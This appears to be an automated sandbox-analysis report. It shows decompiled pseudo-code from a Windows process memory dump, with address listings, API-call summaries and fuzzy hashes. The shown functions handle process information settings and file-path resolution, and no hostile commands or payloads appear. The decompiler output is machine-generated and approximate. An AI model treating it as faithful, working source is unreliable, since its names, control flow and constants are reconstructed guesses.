                                                    0x011dc388
                                                    0x011dc38b
                                                    0x011dc392
                                                    0x011dc394
                                                    0x011dc397
                                                    0x011dc39a
                                                    0x00000000
                                                    0x011dc39c
                                                    0x011dc39c
                                                    0x00000000
                                                    0x011dc39c
                                                    0x011dc39a
                                                    0x011dc37f
                                                    0x011dc349
                                                    0x011dc340
                                                    0x011dc33b
                                                    0x011dc332
                                                    0x00000000
                                                    0x011dc3a3
                                                    0x011dc3a3
                                                    0x011dc3a6
                                                    0x011dc3a8
                                                    0x011ea855
                                                    0x011ea856
                                                    0x011ea85b
                                                    0x011ea85d
                                                    0x011ea8ef
                                                    0x011ea8fb
                                                    0x011ea901
                                                    0x011ea902
                                                    0x011dc471
                                                    0x011dc473
                                                    0x011dc473
                                                    0x011dc476
                                                    0x011dc479
                                                    0x011dc479
                                                    0x011dc486
                                                    0x011dc496
                                                    0x011dc498
                                                    0x011dc49a
                                                    0x011ea91a
                                                    0x011ea91c
                                                    0x011dc4a0
                                                    0x011dc4b3
                                                    0x011dc4b5
                                                    0x011dc4b7
                                                    0x011dc4b9
                                                    0x00000000
                                                    0x011dc4bf
                                                    0x011dc4bf
                                                    0x011dc4c4
                                                    0x011dc4c6
                                                    0x011ea922
                                                    0x011ea922
                                                    0x011dc4cf
                                                    0x011dc4d4
                                                    0x011dc4d9
                                                    0x011dc4dc
                                                    0x011dc4de
                                                    0x00000000
                                                    0x011dc4e4
                                                    0x011dc4e4
                                                    0x011dc4ef
                                                    0x011dc4f7
                                                    0x011dc4fd
                                                    0x011dc504
                                                    0x011dc509
                                                    0x011dc50c
                                                    0x011dc50f
                                                    0x011dc512
                                                    0x011dc514
                                                    0x011dc514
                                                    0x011dc527
                                                    0x011dc529
                                                    0x011dc52b
                                                    0x011dc56c
                                                    0x011dc56c
                                                    0x011dc56f
                                                    0x00000000
                                                    0x00000000
                                                    0x011dc577
                                                    0x011dc57f
                                                    0x011dc581
                                                    0x011dc538
                                                    0x011dc540
                                                    0x011dc542
                                                    0x011dc59b
                                                    0x00000000
                                                    0x011dc544
                                                    0x011dc54a
                                                    0x011dc552
                                                    0x011dc554
                                                    0x011ea932
                                                    0x011ea939
                                                    0x011ea93a
                                                    0x011ea93c
                                                    0x011ea94a
                                                    0x011ea94d
                                                    0x00000000
                                                    0x011ea953
                                                    0x011ea953
                                                    0x011ea954
                                                    0x011ea959
                                                    0x011ea961
                                                    0x011ea963
                                                    0x011ea963
                                                    0x011ea93e
                                                    0x011ea93e
                                                    0x00000000
                                                    0x011ea93e
                                                    0x011dc55a
                                                    0x011dc55a
                                                    0x00000000
                                                    0x011dc55a
                                                    0x011dc554
                                                    0x011dc583
                                                    0x011dc583
                                                    0x011dc561
                                                    0x011dc568
                                                    0x011dc56a
                                                    0x011dc56a
                                                    0x00000000
                                                    0x011dc56a
                                                    0x00000000
                                                    0x011dc581
                                                    0x011dc58c
                                                    0x011dc58c
                                                    0x011dc58c
                                                    0x011dc4de
                                                    0x011dc4b9
                                                    0x011dc58e
                                                    0x011dc596
                                                    0x011ea863
                                                    0x011ea863
                                                    0x011ea868
                                                    0x011ea86a
                                                    0x011ea86d
                                                    0x011ea870
                                                    0x00000000
                                                    0x011ea870
                                                    0x011dc3ae
                                                    0x011dc3ae
                                                    0x011dc3b1
                                                    0x011dc3c0
                                                    0x011dc3c2
                                                    0x00000000
                                                    0x011dc3c2
                                                    0x00000000
                                                    0x011dc3a8
                                                    0x011dc2e7
                                                    0x011d5f23
                                                    0x011d5f24
                                                    0x011d5f31
                                                    0x011d5f31
                                                    0x011d5ec9
                                                    0x011d5ecb
                                                    0x011d5ecc
                                                    0x011d5ecc
                                                    0x011d5ed2
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5eda
                                                    0x011d5edd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5edd
                                                    0x00000000
                                                    0x011d5ecc
                                                    0x011d5ec7
                                                    0x011d5eb5
                                                    0x011d5ea0
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsnicmpswscanf
                                                    • String ID: :EOF
                                                    • API String ID: 1534968528-551370653
                                                    • Opcode ID: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                                    • Instruction ID: 9a743848c4572d711767abbe370205ac22ef8f816b3b7dd5a999dc47071e0d55
                                                    • Opcode Fuzzy Hash: abbb5e2a6c2a3ccad87e90427aad1e58b42f55bbbaed136f5416a340dde28b6c
                                                    • Instruction Fuzzy Hash: 35A10330A046169BEB2DDFACD4487BABBF5FF04314F14441EE942D7281EB759A41C792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D58A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E011D58A4() {
				intOrPtr _v8;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				void _v28;
				void _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __ecx;
				signed int _t22;
				intOrPtr _t29;
				long _t40;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t57;
				intOrPtr _t60;
				intOrPtr* _t62;
				void* _t67;

				_t44 = _t67;
				_push(_t45);
				_push(_t45);
				_v8 =  *((intOrPtr*)(_t67 + 4));
				_t22 =  *0x1218064 & 0x000000ff;
				_v24 = _t45;
				_push(0);
				_push(0x120b8f8);
				_v16 = 0;
				_v20 = 0xc0000001;
				 *0x11fd560 = _t22;
				L011E82C1();
				if(_t22 != 0) {
					_t60 = 1;
					_v16 = 1;
				} else {
					_t48 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t48 = 0x1213ab0;
					}
					_t51 =  *0x1213cc0;
					E011E36CB(_t44, _t48,  *0x1213cc0, 0);
					 *0x11fd56c = 0;
					 *0x11fd5ac = 0;
					 *0x11fd564 = 1;
					 *0x11fd55c = 1;
					 *0x11fd0c0 = 1;
					_t29 =  *0x11fd5dc; // 0x0
					_t49 = 0x24;
					 *0x11fd5a8 = 0;
					 *0x11fd5a4 = 0;
					 *0x11fd568 = _t29;
					_t62 = E011E00B0(_t49);
					if(_t62 == 0) {
						L14:
						E011F9287(_t49);
						__imp__longjmp(0x120b8b8, 1);
						goto L15;
					} else {
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0x1c)) = 0;
						_t49 = 0x24;
						_v36 = _t62;
						 *((intOrPtr*)(_t62 + 0x20)) = 0;
						_t57 = E011E00B0(_t49);
						if(_t57 == 0) {
							goto L14;
						} else {
							 *_t57 = 0;
							 *((intOrPtr*)(_t57 + 0x1c)) = 0;
							_v40 = _t57;
							 *((intOrPtr*)(_t57 + 0x20)) = 0;
							E011D450B(_v24, _t62, _t57);
							_t40 = NtQueryInformationProcess(0xffffffff, 0x27,  &_v32, 4, 0);
							_v20 = _t40;
							if(_t40 >= 0) {
								_v28 = 2;
								NtSetInformationProcess(0xffffffff, 0x27,  &_v28, 4);
							}
							_t51 = _t57;
							_t49 = _t62;
							if( *0x11fd55c == 4) {
								L15:
								E011F8664(_t49, _t51);
								_t60 = _v16;
							} else {
								_t60 = E011D48E6(_t49, _t51);
								_v16 = _t60;
							}
						}
					}
					E011E274C(0x1213d00, 0x104, L"%9d",  *0x11fd56c);
					E011DC108(_t49, 0x2336, 1, 0x1213d00);
					 *0x11fd560 =  *0x1218064 & 0x000000ff;
				}
				if(_v20 >= 0) {
					NtSetInformationProcess(0xffffffff, 0x27,  &_v32, 4);
				}
				return _t60;
			}






















                                                    0x011d58a7
                                                    0x011d58a9
                                                    0x011d58aa
                                                    0x011d58b5
                                                    0x011d58be
                                                    0x011d58c9
                                                    0x011d58cc
                                                    0x011d58cd
                                                    0x011d58d2
                                                    0x011d58d5
                                                    0x011d58dc
                                                    0x011d58e1
                                                    0x011d58ea
                                                    0x011e97fc
                                                    0x011e97fd
                                                    0x011d58f0
                                                    0x011d58f0
                                                    0x011d58f8
                                                    0x011e9805
                                                    0x011e9805
                                                    0x011d58fe
                                                    0x011d5905
                                                    0x011d590c
                                                    0x011d5913
                                                    0x011d591b
                                                    0x011d5920
                                                    0x011d5925
                                                    0x011d592a
                                                    0x011d592f
                                                    0x011d5930
                                                    0x011d5936
                                                    0x011d593c
                                                    0x011d5946
                                                    0x011d594a
                                                    0x011e980f
                                                    0x011e980f
                                                    0x011e981b
                                                    0x00000000
                                                    0x011d5950
                                                    0x011d5950
                                                    0x011d5954
                                                    0x011d5957
                                                    0x011d5958
                                                    0x011d595b
                                                    0x011d5963
                                                    0x011d5967
                                                    0x00000000
                                                    0x011d596d
                                                    0x011d5972
                                                    0x011d5976
                                                    0x011d597a
                                                    0x011d597d
                                                    0x011d5980
                                                    0x011d5991
                                                    0x011d5997
                                                    0x011d599c
                                                    0x011d59a3
                                                    0x011d59af
                                                    0x011d59af
                                                    0x011d59bc
                                                    0x011d59be
                                                    0x011d59c0
                                                    0x011e9821
                                                    0x011e9821
                                                    0x011e9826
                                                    0x011d59c6
                                                    0x011d59cb
                                                    0x011d59cd
                                                    0x011d59cd
                                                    0x011d59c0
                                                    0x011d5967
                                                    0x011d59e6
                                                    0x011d59f3
                                                    0x011d5a02
                                                    0x011d5a02
                                                    0x011d5a0b
                                                    0x011d5a17
                                                    0x011d5a17
                                                    0x011d5a27

                                                    APIs
                                                    • _setjmp3.MSVCRT ref: 011D58E1
                                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                                    • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 011D5991
                                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D59AF
                                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D5A17
                                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011E981B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                                    • String ID: %9d
                                                    • API String ID: 4212706909-2241623522
                                                    • Opcode ID: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                                    • Instruction ID: 076ada4763b7f5cd79016c0bda98e2724dde123a8b3f8abc480590b9f25c1222
                                                    • Opcode Fuzzy Hash: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                                    • Instruction Fuzzy Hash: B741C5B0D00315EFDB28DFA9A849A6ABFF4FB54728F10422EE624D7294DB704540CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D5226, Relevance: 9.5, APIs: 6, Instructions: 458COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E011D5226(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				long _v28;
				char _v32;
				LPWSTR* _v36;
				void _v556;
				signed int _v560;
				signed short** _v564;
				WCHAR* _v568;
				LPWSTR* _v572;
				intOrPtr _v576;
				LPWSTR* _v580;
				signed int _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed short** _t160;
				intOrPtr _t164;
				LPWSTR* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				signed int _t176;
				void* _t179;
				signed short** _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				signed int _t194;
				void* _t195;
				signed short _t197;
				intOrPtr _t199;
				void* _t205;
				void* _t207;
				void* _t209;
				signed short _t211;
				void* _t213;
				WCHAR* _t222;
				signed short* _t225;
				intOrPtr* _t226;
				void* _t228;
				intOrPtr _t230;
				signed short* _t235;
				signed int _t236;
				intOrPtr* _t244;
				short* _t247;
				void* _t248;
				intOrPtr* _t249;
				intOrPtr* _t256;
				intOrPtr* _t259;
				void* _t262;
				intOrPtr* _t263;
				signed short* _t266;
				signed short* _t267;
				intOrPtr* _t269;
				signed int _t273;
				signed int _t276;
				signed short* _t280;
				void* _t288;
				signed short* _t289;
				void* _t292;
				short* _t293;
				void* _t297;
				short _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				signed int _t306;
				signed short* _t307;
				void* _t314;
				intOrPtr* _t316;
				intOrPtr* _t322;
				LPWSTR* _t324;
				void* _t325;
				void* _t326;
				WCHAR* _t327;
				void* _t328;
				void* _t331;
				intOrPtr _t333;
				void* _t334;
				intOrPtr _t336;
				intOrPtr* _t340;
				intOrPtr* _t341;
				short* _t344;
				void* _t346;
				intOrPtr* _t347;
				signed int _t349;
				intOrPtr _t353;
				intOrPtr _t357;
				signed int _t363;

				_t295 = __edx;
				_t236 = _t363;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t236 + 4));
				_t361 = (_t363 & 0xfffffff8) + 4;
				_t146 =  *0x11fd0b4; // 0x1805bc26
				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
				_t322 =  *((intOrPtr*)(_t236 + 8));
				_t333 = __ecx;
				_v28 = 0x104;
				_v584 = __edx;
				_v576 = __ecx;
				_v568 = _t322;
				_v572 = 0;
				_v580 = 0;
				_v36 = 0;
				_v32 = 1;
				memset( &_v556, 0, 0x104);
				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_t324 = 1;
					L25:
					__imp__??_V@YAXPAX@Z(_v36);
					_pop(_t325);
					_pop(_t334);
					return E011E6FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
				}
				_t160 =  *(_v584 + 0x20);
				_v564 = _t160;
				if(_t160 == 0) {
					_t161 =  *0x1213cb8;
					if( *0x1213cb8 == 0) {
						_t161 = 0x1213ab0;
					}
					E011E1040(_t322,  *(_t236 + 0xc), _t161);
					_t244 = _t322;
					_v572 = 0;
					_t326 = 2;
					_t297 = _t244 + 2;
					do {
						_t164 =  *_t244;
						_t244 = _t244 + _t326;
					} while (_t164 != 0);
					_t165 = _v568;
					_t336 = _v576;
					_t298 = 0x5c;
					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
					if(_t165 >= _t247) {
						L38:
						 *_t247 = _t298;
						 *((short*)(_t247 + 2)) = 0;
						L39:
						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
							L54:
							_t299 = _v568;
							_t248 = _t299 + 2;
							do {
								_t167 =  *_t299;
								_t299 = _t299 + _t326;
							} while (_t167 != 0);
							_v572 = _t299 - _t248 >> 1;
							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_t295 = 0;
							_t249 = _t340;
							_v560 = _t249 + 2;
							do {
								_t169 =  *_t249;
								_t249 = _t249 + _t326;
							} while (_t169 != 0);
							_t327 = _v568;
							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
								L53:
								_t341 = _v564;
								L89:
								_v580 = 1;
								L20:
								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
									L24:
									_t324 = _v580;
									goto L25;
								}
								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
										goto L90;
									}
								} else {
									L90:
									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
									if(_t328 != 0xffffffff) {
										_t176 = GetFileType(_t328);
										CloseHandle(_t328);
										if((_t176 & 0xffff7fff) == 1) {
											_t344 = _v568;
											_t295 = 0x400023d3;
											_t179 = E011F9583(_t344, 0x400023d3, 0x400023d4);
											if(_t179 == 0) {
												 *_t344 = 0;
											} else {
												if(_t179 == 0) {
													_t183 = _v564;
													if(_t183 == 0) {
														_t183 = _v584;
													}
													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
												}
											}
										}
									}
								}
								goto L24;
							}
							_push(_t340);
							L80:
							_t295 =  *(_t236 + 0xc);
							E011E18C0(_t327,  *(_t236 + 0xc));
							_t341 = _v564;
							goto L20;
						}
						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
						_t256 = _t303;
						_v572 = _t303;
						_v560 = _t256 + 2;
						do {
							_t186 =  *_t256;
							_t256 = _t256 + _t326;
						} while (_t186 != 0);
						if(_t256 == _v560) {
							goto L54;
						}
						_t259 = _t303;
						_t295 = 0;
						_t346 = _t259 + 2;
						do {
							_t187 =  *_t259;
							_t259 = _t259 + _t326;
						} while (_t187 != 0);
						if(_t259 == _t346) {
							L52:
							_t327 = _v568;
							goto L53;
						}
						_t347 = _v568;
						_t262 = _t347 + 2;
						do {
							_t188 =  *_t347;
							_t347 = _t347 + _t326;
						} while (_t188 != 0);
						_t263 = _v572;
						_t349 = _t347 - _t262 >> 1;
						_t72 = _t263 + 2; // 0x2
						_v560 = _t72;
						do {
							_t190 =  *_t263;
							_t263 = _t263 + _t326;
						} while (_t190 != 0);
						_t295 = _v572;
						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						_push(_t295);
						goto L80;
					} else {
						goto L33;
					}
					do {
						L33:
						if( *_t165 == _t298) {
							_v572 = _t165;
						}
						_t165 = _t165 + _t326;
					} while (_t165 < _t247);
					if(_v572 == 0 || _v572 < _t247 - 2) {
						goto L38;
					} else {
						goto L39;
					}
				}
				_t266 =  *_t160;
				_t331 = 2;
				_t194 =  *_t266 & 0x0000ffff;
				_t306 = _t194;
				_v560 = _t306;
				if(_t194 == 0) {
					L6:
					_t195 = 0x3a;
					if(_t306 == _t195) {
						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
							L73:
							_t307 =  *_v564;
							_t267 =  &(_t307[1]);
							do {
								_t197 =  *_t307;
								_t307 = _t307 + _t331;
							} while (_t197 != 0);
							_t295 = _t307 - _t267 >> 1;
							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
							_v560 = _t269 + 2;
							do {
								_t199 =  *_t269;
								_t269 = _t269 + _t331;
							} while (_t199 != 0);
							_t353 = _v576;
							_t327 = _v568;
							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
								goto L53;
							}
							E011E1040(_t327,  *(_t236 + 0xc),  *_v564);
							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
							L79:
							_push(_t205);
							goto L80;
						}
						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
						_t273 = _t295;
						_v560 = _t273 + 2;
						do {
							_t207 =  *_t273;
							_t273 = _t273 + _t331;
						} while (_t207 != 0);
						if(_t273 == _v560) {
							goto L73;
						}
						_t276 = _t295;
						_v560 = _t276 + 2;
						do {
							_t209 =  *_t276;
							_t276 = _t276 + _t331;
						} while (_t209 != 0);
						if(_t276 == _v560) {
							goto L52;
						}
						_t280 =  *_v564;
						_v560 =  &(_t280[1]);
						do {
							_t211 =  *_t280;
							_t280 = _t280 + _t331;
						} while (_t211 != 0);
						_t357 = _v576;
						_v572 = _t280 - _v560 >> 1;
						_v560 = _t295 + 2;
						do {
							_t213 =  *_t295;
							_t295 = _t295 + _t331;
						} while (_t213 != 0);
						if( &(_v572[0]) + _t295 > 0x7fe7) {
							goto L52;
						}
						_t327 = _v568;
						E011E1040(_t327,  *(_t236 + 0xc),  *_v564);
						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
						goto L79;
					}
					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
						L17:
						_t341 = _v564;
						_t327 = _v568;
						_t295 =  *(_t236 + 0xc);
						if(E011D5400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
							E011F985A(_t220);
							_v580 = 1;
						}
						_t222 = _v36;
						if(_t222 == 0) {
							_t222 =  &_v556;
						}
						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
							_t288 = 0x6f;
							E011F985A(_t288);
							goto L89;
						} else {
							goto L20;
						}
					}
					_t313 = _v564;
					_t225 =  *_v564;
					_t289 = _t225;
					if(_v560 == 0) {
						L12:
						if( *_t289 != 0x2a) {
							goto L17;
						}
						_t226 = E011D5846( *_t313);
						_t314 = 0x5c;
						if( *_t226 != _t314) {
							goto L17;
						}
						_t292 = E011E2349( *((intOrPtr*)(_t333 + 4)), _t314);
						if(_t292 == 0) {
							_t293 =  *((intOrPtr*)(_t333 + 4));
							_t228 = 0x3a;
							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
								_t293 = _t293 + 4;
							}
						} else {
							_t293 = _t292 + _t331;
						}
						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
							_v560 = _t316 + 2;
							do {
								_t230 =  *_t316;
								_t316 = _t316 + _t331;
							} while (_t230 != _v572);
							if(_t316 != _v560) {
								 *_t293 = 0;
								E011E18C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
							}
						}
						goto L17;
					} else {
						goto L10;
						L10:
						_t289 = _t225;
						_t225 = _t225 + _t331;
						if( *_t225 != 0) {
							goto L10;
						} else {
							_t333 = _v576;
							goto L12;
						}
					}
				} else {
					goto L4;
					L4:
					_t235 = _t266;
					_t266 = _t266 + _t331;
					if( *_t266 != 0) {
						goto L4;
					} else {
						_t306 =  *_t235 & 0x0000ffff;
						goto L6;
					}
				}
			}





























































































                                                    0x011d5226
                                                    0x011d5229
                                                    0x011d522b
                                                    0x011d522c
                                                    0x011d5237
                                                    0x011d523b
                                                    0x011d5243
                                                    0x011d524a
                                                    0x011d524f
                                                    0x011d5257
                                                    0x011d5259
                                                    0x011d525e
                                                    0x011d526c
                                                    0x011d5273
                                                    0x011d5279
                                                    0x011d527f
                                                    0x011d5285
                                                    0x011d5288
                                                    0x011d528c
                                                    0x011d52b5
                                                    0x011d53f5
                                                    0x011d53d2
                                                    0x011d53d5
                                                    0x011d53e1
                                                    0x011d53e4
                                                    0x011d53f0
                                                    0x011d53f0
                                                    0x011d52c1
                                                    0x011d52c4
                                                    0x011d52cc
                                                    0x011e915f
                                                    0x011e9166
                                                    0x011e9168
                                                    0x011e9168
                                                    0x011e9173
                                                    0x011e9178
                                                    0x011e917e
                                                    0x011e9186
                                                    0x011e9187
                                                    0x011e918a
                                                    0x011e918a
                                                    0x011e918d
                                                    0x011e918f
                                                    0x011e9194
                                                    0x011e919c
                                                    0x011e91a6
                                                    0x011e91a7
                                                    0x011e91ac
                                                    0x011e91d3
                                                    0x011e91d5
                                                    0x011e91d8
                                                    0x011e91dc
                                                    0x011e91e3
                                                    0x011e929f
                                                    0x011e929f
                                                    0x011e92a7
                                                    0x011e92aa
                                                    0x011e92aa
                                                    0x011e92ad
                                                    0x011e92af
                                                    0x011e92be
                                                    0x011e92c7
                                                    0x011e92ca
                                                    0x011e92cc
                                                    0x011e92d1
                                                    0x011e92d7
                                                    0x011e92d7
                                                    0x011e92da
                                                    0x011e92dc
                                                    0x011e92ed
                                                    0x011e92fd
                                                    0x011e9294
                                                    0x011e9294
                                                    0x011e94f9
                                                    0x011e94f9
                                                    0x011d53a5
                                                    0x011d53a9
                                                    0x011d53cc
                                                    0x011d53cc
                                                    0x00000000
                                                    0x011d53cc
                                                    0x011d53b2
                                                    0x011d53c6
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9508
                                                    0x011e9508
                                                    0x011e9521
                                                    0x011e9526
                                                    0x011e952d
                                                    0x011e953c
                                                    0x011e9547
                                                    0x011e954d
                                                    0x011e9553
                                                    0x011e9566
                                                    0x011e9568
                                                    0x011e9591
                                                    0x011e956a
                                                    0x011e956d
                                                    0x011e9573
                                                    0x011e957b
                                                    0x011e957d
                                                    0x011e957d
                                                    0x011e9583
                                                    0x011e9583
                                                    0x011e956d
                                                    0x011e9568
                                                    0x011e9547
                                                    0x011e9526
                                                    0x00000000
                                                    0x011d53b2
                                                    0x011e92ff
                                                    0x011e9462
                                                    0x011e9462
                                                    0x011e9467
                                                    0x011e946c
                                                    0x00000000
                                                    0x011e946c
                                                    0x011e91ec
                                                    0x011e91f4
                                                    0x011e91f6
                                                    0x011e91ff
                                                    0x011e9205
                                                    0x011e9205
                                                    0x011e9208
                                                    0x011e920a
                                                    0x011e9217
                                                    0x00000000
                                                    0x00000000
                                                    0x011e921d
                                                    0x011e921f
                                                    0x011e9221
                                                    0x011e9224
                                                    0x011e9224
                                                    0x011e9227
                                                    0x011e9229
                                                    0x011e9232
                                                    0x011e928e
                                                    0x011e928e
                                                    0x00000000
                                                    0x011e928e
                                                    0x011e9234
                                                    0x011e923c
                                                    0x011e923f
                                                    0x011e923f
                                                    0x011e9242
                                                    0x011e9244
                                                    0x011e924b
                                                    0x011e9251
                                                    0x011e9255
                                                    0x011e9258
                                                    0x011e925e
                                                    0x011e925e
                                                    0x011e9261
                                                    0x011e9263
                                                    0x011e9271
                                                    0x011e9280
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9282
                                                    0x011e9288
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e91ae
                                                    0x011e91ae
                                                    0x011e91b1
                                                    0x011e91b3
                                                    0x011e91b3
                                                    0x011e91b9
                                                    0x011e91bb
                                                    0x011e91c6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e91c6
                                                    0x011d52d2
                                                    0x011d52d6
                                                    0x011d52d7
                                                    0x011d52da
                                                    0x011d52dc
                                                    0x011d52e5
                                                    0x011d52f5
                                                    0x011d52f7
                                                    0x011d52fb
                                                    0x011e930c
                                                    0x011e93e9
                                                    0x011e93f1
                                                    0x011e93f3
                                                    0x011e93f6
                                                    0x011e93f6
                                                    0x011e93f9
                                                    0x011e93fb
                                                    0x011e9408
                                                    0x011e940d
                                                    0x011e9415
                                                    0x011e941b
                                                    0x011e941b
                                                    0x011e941e
                                                    0x011e9420
                                                    0x011e942e
                                                    0x011e9434
                                                    0x011e9443
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9456
                                                    0x011e945e
                                                    0x011e9461
                                                    0x011e9461
                                                    0x00000000
                                                    0x011e9461
                                                    0x011e9315
                                                    0x011e931d
                                                    0x011e9322
                                                    0x011e9328
                                                    0x011e9328
                                                    0x011e932b
                                                    0x011e932d
                                                    0x011e933a
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9340
                                                    0x011e9347
                                                    0x011e934d
                                                    0x011e934d
                                                    0x011e9350
                                                    0x011e9352
                                                    0x011e935f
                                                    0x00000000
                                                    0x00000000
                                                    0x011e936d
                                                    0x011e9372
                                                    0x011e9378
                                                    0x011e9378
                                                    0x011e937b
                                                    0x011e937d
                                                    0x011e938b
                                                    0x011e9393
                                                    0x011e939b
                                                    0x011e93a1
                                                    0x011e93a1
                                                    0x011e93a4
                                                    0x011e93a6
                                                    0x011e93c1
                                                    0x00000000
                                                    0x00000000
                                                    0x011e93cd
                                                    0x011e93da
                                                    0x011e93e2
                                                    0x00000000
                                                    0x011e93e2
                                                    0x011d5305
                                                    0x011d5362
                                                    0x011d5365
                                                    0x011d536b
                                                    0x011d5373
                                                    0x011d537f
                                                    0x011e94dd
                                                    0x011e94e2
                                                    0x011e94e2
                                                    0x011d5385
                                                    0x011d538a
                                                    0x011d53f8
                                                    0x011d53f8
                                                    0x011d539f
                                                    0x011e94f3
                                                    0x011e94f4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d539f
                                                    0x011d530f
                                                    0x011d5315
                                                    0x011d5317
                                                    0x011d5319
                                                    0x011d532c
                                                    0x011d5330
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5334
                                                    0x011d533b
                                                    0x011d533f
                                                    0x00000000
                                                    0x00000000
                                                    0x011d5349
                                                    0x011d534d
                                                    0x011e9477
                                                    0x011e947c
                                                    0x011e9481
                                                    0x011e9487
                                                    0x011e9487
                                                    0x011d5353
                                                    0x011d5353
                                                    0x011d5353
                                                    0x011d535c
                                                    0x011e9492
                                                    0x011e949b
                                                    0x011e94a1
                                                    0x011e94a1
                                                    0x011e94a4
                                                    0x011e94a6
                                                    0x011e94b7
                                                    0x011e94bf
                                                    0x011e94d1
                                                    0x011e94d1
                                                    0x011e94b7
                                                    0x00000000
                                                    0x011d531b
                                                    0x011d531b
                                                    0x011d531d
                                                    0x011d531d
                                                    0x011d531f
                                                    0x011d5324
